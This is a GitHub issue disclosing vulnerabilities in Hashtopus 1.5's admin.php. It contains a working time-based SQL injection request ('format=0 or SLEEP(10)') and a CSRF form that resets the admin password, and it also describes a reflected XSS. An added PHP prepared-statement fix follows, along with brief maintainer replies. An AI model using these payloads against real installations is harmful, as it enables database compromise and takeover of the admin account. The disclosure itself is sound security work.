Hashtopus 1.5 Multiple Vulnerabilities #63

ghost opened this issue Jul 26, 2017 · 2 comments



commented Jul 26, 2017

SQL Injection (authenticated)
A SQL Injection is present in admin.php on line 1425:

          $vysledek=mysqli_query_wrapper($dblink,"INSERT INTO hashlists (name,format,hashtype) VALUES ('$name',$format,$hashtype)");

Proof of concept:

POST /hashtopus/admin.php?a=newhashlistp HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: PHPSESSID=<valid_session_id>
Connection: close

name=ASD&format=0 or SLEEP(10)

Reflective XSS (unauthenticated)
An unauthenticated reflective cross-site scripting vulnerability is present on line 2826 in admin.php:

name=\"return\" value=\"".$_SERVER['QUERY_STRING']." 

Proof of concept:

CSRF (Change admin password to login)
Cross-site request forgery protection is not available on sensitive forms.

<script>history.pushState('', '', '/')</script>
    <form action="http://localhost/hashtopus/admin.php?a=config" method="POST">
      <input type="hidden" name="password" value="0wn3d" />
      <input type="submit" value="Submit request" />
    </form>
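
One way to harden the INSERT quoted in the SQL injection report above, as an added example that is not part of the original report and is not Hashtopus code: validate the numeric fields as integers and bind all three values as parameters. The function names and the 0-2 range for `format` are assumptions; `insert_hashlist` needs a live mysqli connection, so the demo loop only exercises the validation.

```php
<?php
// Added example, not Hashtopus code. Table and column names come from the
// query quoted in the report; function names are hypothetical.

// Accept only a plain base-10 integer within [$min, $max]; return null otherwise.
// filter_var() rejects strings such as "0 or SLEEP(10)" outright, where an
// (int) cast would silently truncate them to 0.
function parse_int_field($raw, int $min, int $max): ?int
{
    if (!is_string($raw)) {
        return null; // e.g. format[]=1 arrives as an array
    }
    $value = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $value === false ? null : $value;
}

// Insert a hashlist with bound parameters: 's' binds $name as a string and
// 'i' binds $format and $hashtype as integers, so none of the three values
// is ever parsed as SQL text.
function insert_hashlist(mysqli $dblink, string $name, int $format, int $hashtype): bool
{
    $stmt = mysqli_prepare($dblink,
        'INSERT INTO hashlists (name, format, hashtype) VALUES (?, ?, ?)');
    if ($stmt === false) {
        return false;
    }
    mysqli_stmt_bind_param($stmt, 'sii', $name, $format, $hashtype);
    $ok = mysqli_stmt_execute($stmt);
    mysqli_stmt_close($stmt);
    return $ok;
}

// Constructed inputs; the first is the 'format' value from the report's request.
// The 0-2 range is an assumed bound for illustration, not taken from Hashtopus.
foreach (['0 or SLEEP(10)', '0', '2', '1;--', ''] as $raw) {
    $format = parse_int_field($raw, 0, 2);
    printf("%-18s => %s\n", var_export($raw, true),
        $format === null ? 'rejected' : "accepted as $format");
}
```

Escaping alone would not have fixed the original query, because `$format` and `$hashtype` sit outside quotes; the integer check and the typed binding are what remove the injection point.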


commented Dec 28, 2017

Hi. I didn't really bother with admin.php as long as the user is authenticated...



commented Dec 28, 2017

But with the rest you are right :)
